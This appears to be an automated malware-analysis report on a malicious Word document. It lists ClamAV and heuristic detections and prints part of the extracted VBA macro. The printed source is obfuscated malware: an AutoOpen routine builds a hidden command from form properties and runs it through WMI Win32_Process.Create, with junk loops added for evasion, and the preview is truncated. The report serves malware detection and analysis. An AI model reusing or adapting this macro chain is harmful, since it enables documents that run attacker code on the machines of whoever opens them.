MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1218.011 System Binary Proxy Execution: Rundll32
The file contains VBA macros with an AutoOpen function, indicating it's designed to execute automatically upon opening. Critical heuristics indicate the use of WMI (Win32_Process.Create) to launch processes, a common technique for downloading and executing further malicious code. The ClamAV detection name 'Doc.Downloader.Smpowloadbb' further supports the downloader functionality.
Heuristics 7
-
ClamAV: Doc.Downloader.Smpowloadbb-6965585-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Smpowloadbb-6965585-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6844 bytes |
SHA-256: c8fd1eea131cb333dad26adbb644b225e00dbbd9513666b05e7b9ca0a8b82b43 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "W81829"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "U5283625"
Attribute VB_Base = "0{9CDA5053-7926-40C9-AF74-F886775F999C}{D1D1A016-7FCD-4AFF-AD12-316F0F95E952}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "G6_3__"
Attribute VB_Name = "n68739"
Attribute VB_Name = "F602_9"
Attribute VB_Base = "0{DCE02AED-0885-46D3-9C91-DE02FEA9443F}{16283B3C-023E-4097-8FFD-57A5340EF0BE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "t534464"
Function A_13_00(k51065)
While d_0825 And F327358
'O_96423b5042471w5903432l7261919
'o7020_F91209_1c22101K4343043
'd7_3651i85714_3o90__9n739787
Wend
While z_53617 And j0669466
'C89_7300Y107_011z35890u9__92
'I19_8209C060362p3228_8_Z3873813
'p573305Z60033s11_30S53423
Wend
Set A_13_00 = CVar(k51065)
While f0848023 And i78_761
'S75678b3_91723K_6680n02_0_
'q33527j_007_z502900b02774_2
't1307450s6936_61z58789E708639
Wend
While j_70941 And t83_8770
'U6298774M703620h15_044F972139
'H042145p_6689j17355K_9168
'j9_2611C631729b96495_1j692610
Wend
While M46163 And l27545_
'D03208f44134c_8464m_612_
'u077_257v0746962O0791_5J28263
'X4561195U696128L97187h39221
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While Y42_27 And w81954
's815511F4001386b45305_j4992793
't530314v5435_V53_50U468441
'D_453360d42400p_86723p007494
Wend
While k0707116 And o620_30
'h82749_D12482F3_275F163_9
'p526331w58350_F7841304Z4143873
'q034781j2661739v801422X707_1
Wend
Call h820359
While F_429633 And i5713_
'w0807626s63160N144079M23774
'T1449_49t060950f8_2153a84233
'R161_6_2q540900V03_62M28749
Wend
While M219154 And H53057
'H12_787k59_5486Z989_9S7_669
'I178559z5492750i6423653M____27_
'F14_1496c7106000C24561n1_5270
Wend
End Sub
Attribute VB_Name = "K5821_21"
Function h820359()
On Error Resume Next
While s_903_5 And K_4065
'B372055_A12838O0664830F_6_62
'N6_7404z078759Q70___1A7261576
'k6725431Z689_98Y17214X02225
Wend
While S8_9621 And B72567
'l9_18207U27_41v93_5754Y_04357
'c86132O713287Z9557536J1_256_
'U9194_r243473_k_43620R588274
Wend
J966227 = U5283625.i3587310.ControlTipText + F602_9.S144406 + U5283625.i3587310.PasswordChar + F602_9.W925_358 + U5283625.i3587310 + U5283625.i3587310.ControlSource + F602_9.s27_4534 + U5283625.i3587310.ControlTipText + U5283625.i3587310.PasswordChar + F602_9.w50975 + U5283625.i3587310 + F602_9.h9022_ + U5283625.i3587310
While H38432 And V0_34_3
'I09945G6500_45j437867_u7481695
'p07628d_702279K32473_l942_1
'p996__t416324J22534d0_4979
Wend
While u51918 And w75037
'j_944273I11935J19739J943016
'w7109906T224122B19_28_D5279049
'X3_254C531970J8029_05q54136_
Wend
Set i829910 = A_13_00(GetObject("win" + "mg" _
+ "mts:W" _
+ "in32_Pro" + "cess"))
While M7_3916 And M600434
'C0211739i406671s204802r0430199
'b4_122V14345j36530v124609
't32018j915770Q64__896z09737
Wend
While I067398_ And j_7384
'H93426D1_680i98160_1l8822428
'k08_71w580997c949325b__85__
'q18652m10006i_766833m94_80_
Wend
While V8058_08 And Y345_55
'I7117579Q23483q7_6_6D036369
'O57311Z263_8N74187F5973_9
'z50209Q6434231u6_78032b_642_
Wend
i829910.Create E59934 + J966227 + J9466_, w348_082, s162558, S_1242
While s0944_ And B2_7_8
'N92_6188b9_48324m_031995o8148034
'I1845918X8_623__L488209
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.